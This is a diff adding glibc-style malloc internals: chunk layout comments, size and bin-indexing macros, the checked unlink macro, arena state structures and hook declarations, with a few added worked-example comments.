+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
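+
+/* Example: with SIZE_SZ == 8, a chunk header at address 0x602000
+   yields the user pointer chunk2mem(0x602000) == 0x602010, and
+   mem2chunk simply subtracts the same 2*SIZE_SZ offset.  (Addresses
+   are illustrative only.)  */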
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
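+
+/* Worked example, assuming SIZE_SZ == 8 and 16-byte alignment
+   (MALLOC_ALIGN_MASK == 0xf): request2size(24) == (24 + 8 + 15) & ~15
+   == 32, while request2size(0) falls below MINSIZE and is bumped up
+   to the 32-byte MINSIZE.  */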
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
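+
+/* bin_at(m, i) points offsetof(struct malloc_chunk, fd) bytes before
+   bins[(i - 1) * 2], so that bins[(i - 1) * 2] and the following slot
+   overlay the fd/bk fields of a pretend chunk header; the bin can then
+   be linked like any other malloc_chunk.  */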
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr ("corrupted size vs. prev_size");			      \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr ("corrupted double-linked list");			      \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr ("corrupted double-linked list (not small)");   \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
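+
+/* Restated as a sketch, the list-integrity requirement enforced above
+   before any pointers are written is:
+
+   assert (chunksize (P) == prev_size (next_chunk (P)));
+   assert (P->fd->bk == P && P->bk->fd == P);
+
+   with the analogous check applied to the nextsize links of large
+   chunks.  */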
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
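+
+/* Example, assuming SMALLBIN_WIDTH == 16 and SMALLBIN_CORRECTION == 0
+   (typical 64-bit): a chunk of size 0x90 maps to smallbin_index(0x90)
+   == 0x90 >> 4 == 9, and each small bin holds exactly one chunk size.  */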
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
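+
+/* Example, assuming SIZE_SZ == 8: the smallest large chunk size,
+   0x400 bytes, gives largebin_index_64(0x400) == 48 + (0x400 >> 6)
+   == 64, i.e. the first of the large bins.  */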
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
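+
+/* Example: bin index 70 lives in map word idx2block(70) == 2 and is
+   tested, set, or cleared with the bit idx2bit(70) == 1 << 6.  */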
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
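+
+/* Example, assuming SIZE_SZ == 8: the smallest chunk size, 0x20 bytes,
+   gives fastbin_index(0x20) == (0x20 >> 4) - 2 == 0, so fastbinsY[0]
+   holds 0x20-byte chunks, fastbinsY[1] holds 0x30-byte chunks, etc.  */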
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given its sole purpose is to reduce the number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
